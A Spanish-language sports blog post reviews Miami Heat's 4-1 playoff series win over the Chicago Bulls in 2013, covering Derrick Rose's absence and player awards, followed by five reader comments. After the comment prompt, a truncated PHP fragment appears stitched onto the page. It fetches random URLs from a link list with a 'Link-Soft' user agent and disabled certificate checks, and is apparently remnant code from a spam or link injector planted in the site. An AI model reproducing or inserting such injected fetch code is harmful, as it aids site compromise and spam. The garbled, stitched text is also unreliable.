Resumen Miami Heat 4 – Chicago Bulls 1

16 de May de 2013 por TheDeerHunter

Antes de entrar en harina, se confirma que la 2012-13 queda en blanco para Derrick Rose y que la campaña publicitaria “All in for D-Rose” de Adidas es la de mayor mal fario desde el spot anti-droga de Maradona. La lluvia de críticas que recibe ahora el jugador tiene parte de merecida. No porque estemos de acuerdo en que haya sido un egoísta, pecando de conservador al no jugarse su futuro en ese absurdo “all-in” por la franquicia y sus compañeros (algo que posiblemente tampoco habría conducido a nada). Sino por haber generado, consciente o inconscientemente, unas falsas expectativas y haber caído en una sobreexposición innecesaria. Parece desacertado el concepto de la -por otro lado preciosa- promo, pero lo de las rondas de calentamiento es un error muy gordo. Especulación e incertidumbre es todo lo que ha logrado, además de un importante desgaste para su propia imagen.

bulls heatIndependientemente de este detalle que forma parte de lo extradeportivo, la mala suerte en forma de lesiones ha condicionado de forma significativa la eliminatoria. Además de Rose, ha faltado otro All-Star del equipo como Luol Deng, así como el que venía siendo también titular Kirk Hinrich. Partiendo de la base de que sin estas dos últimas ausencias los vigentes campeones habrían seguido siendo favoritos de manera aplastante, lo hemos dicho todo. Si hasta hemos vuelto a ver jugar algún minuto a Radmanovic…

Además del aspecto físico, adelantábamos en la previa otras dos claves: el dominio de los tableros y el control de los “tempos”. Los Bulls han superado en rebotes al peor equipo de la liga en esta arte de una forma prácticamente inapreciable y, por otro lado, los Heat son uno de los mejores equipos de la liga en el cambio de marchas. Correr contra ellos es un suicidio para cualquiera y en estático estos Bulls tienen muchas limitaciones. El superior talento ofensivo de los de Florida ha marcado la diferencia en un empate técnico entre extraordinarios sistemas defensivos.

Con todo, chapeau por la franquicia del toro. Han dado lo máximo y han peleado hasta cuando estaba todo perdido. Protagonizaron merecidamente una de las mayores sorpresas de esta postemporada ganando el primero en Miami, pero la diferencia de nivel es evidente. Ahora, a esperar al año que viene a ver si pueden hacer cierto eso del “All in for D-Rose” y hacer saltar la banca frente a su bestia negra.

PREMIOS

lebron butler

MVP: Las siglas MVP van a estar mucho tiempo ligadas al rey LeBron. Sin alardes. Casi 24 puntos, 7 rebotes, casi 8 asistencias y 2 robos del mejor del mundo y el azote de Chicago. Tres eliminaciones en los últimos 5 años.

La sorpresa: Excelente Norris Cole comiéndole muchos minutos a Chalmers. 11 puntos por partido con casi un 60% de acierto. Tengo pocas dudas de quién sería mi titular si yo fuera Spoelstra.

La decepción: Además de su habitual garra, Chicago necesitó un milagro para eliminar a Brooklyn. El milagro tiene nombre. No vamos a cargar las tintas contra Nate Robinson, que ha vuelto a ser de los destacados. Simplemente no se puede vivir de milagros.

El mayor esfuerzo en vano: Fabuloso Jimmy Butler. No sólo porque le ha tocado bailar con la más fea y ha salido airoso, sino que además ha sido el mejor de los suyos ofensivamente. Tenemos muchas dudas de si el All-Star Luol Deng lo hubiera hecho mejor.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    serie sin paridad, con deng y con hinrch hubse sido lo mismo,.incluiso con rose no hubieden eliminado al heaty

    La nica forma de vender a miami es castigando y mucho el juego interior y obligar a spolra a poner a joel anthony de titular y que juegue muchos minutos, indiana podria hacerlo, mnphis tamb y quiza hasta los spurs

    No hay otro equipo en la liga apaz de ganarles a 7 juegos

    Los lakers eran candidato con apu y howard pero ya sabemos como han eminado

      Citar

  2. GreenPride dice:
    #2

    Serie absolutamente desequelibrada que ha acabado 4-1 y ha estado más interesante de lo que yo esperaba debido a la testiculina y las enormes dosis de orgullo de los de Chicago.
    Con Hinrich y Deng en pista no habría cambiado mucho la cosa probablemente pero sin ellos los Bulls se han visto exprimidos (especialmente un fenomenal Butler) lo que les ha llevado a atacar aún peor en un ya de por sí limitado equipo para la ofensiva.
    Creo que es justo decir que la defensa de los Bulls ha sido ejemplar. Han controlado dentro de unos límites humanos a LeBron sin olvidarse en exceso de los demás y éste ha necesitado la ayuda de Cole, Bosh o Battier en momentos calientes para poder sacar los partidos adelante.
    Para Chicago acaba una temporada marcada por el no-regreso de Rose, alimentado por la publicidad y por él mismo. Han merecido un gran aplauso por su forma de jugar dejándolo todo y eliminando en campo contrario a los Nets pero ahora toca dar el paso definitivo a la franquicia. Con Rose de vuelta y la explosión de Jimmy Butler, ¿Es hora de sacar provecho de Deng a cambio de un jugador con mejores características ofensivas? Veremos qué camino toman en la Windy City este verano…
    Por los Heat, sencillamente no han necesitado jugar al límite aunque dejan algunas dudas de cara a las finales de conferencia y finales de la NBA. La principal es el mal estado físico y por tanto deficiente juego de Wade. Con las rodillas tocadas y con su más que fallido lanzamiento exterior (esto sin tener nada que ver con su lesión) Wade ha estado desaparecido durante la mayoría de la eliminatoria lo que podría ser un gran problema ante equipos con grandes defensas y algún recurso de ataque más (Pacers y sobre todo Memphis o San Antonio). Además durante ratos de los partidos los Bulls han matado a los Heat bajo los aros. Quizás no tanto cómo deberían haber hecho pero da miedo pensar qué podrían hacer Marc&Zach llegado el caso e incluso Duncan&Splitter. Los Heat siguen siendo los grandes favoritos pero todavía no hemos tenido medida real de sus posibilidades en estos playoffs. Veremos si los Pacers (o Knicks que no creo) pueden ponerlos verdaderamente a prueba en las finales de conferencia

      Citar

  3. Sancho88 dice:
    #3

    Pues no esta mal lo que planteas GreenPride. Un sign and trade Tyreke por Deng beneficiaría a Sacramento y Chicago. Rose-Tryeke-Bulter-Boozer-Noah dan miedo, con Nate y Bellinelli completando el backourt, Teague haciéndose mayor, y Gibson ayudando en la zona. Incluso Mohammed podría ayudar tb, aunque ya va siendo hora de incorporar a Mirotic

      Citar

  4. MagicJohnson32 dice:
    #4

    Nate no va a seguir. Indiscutiblemente, los Bulls necesitan un SG, y con la aparición (bendita aparición) de Butler sí que parece que Deng es prescindible. Tiene unos 14 kilos pero sólo un año de contrato, así que si no en verano, al menos cuando se acerque el trade deadline será un jugador interesante para equipos en reconstrucción o aspirantes.

      Citar

  5. Jose Luis dice:
    #5

    Ni Nate va a seguir, ni un perímetro con Butler y Evans le abren espacios a Boozer ni Rose para operar cerca del aro, así que no lo veo para nada un buen cambio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>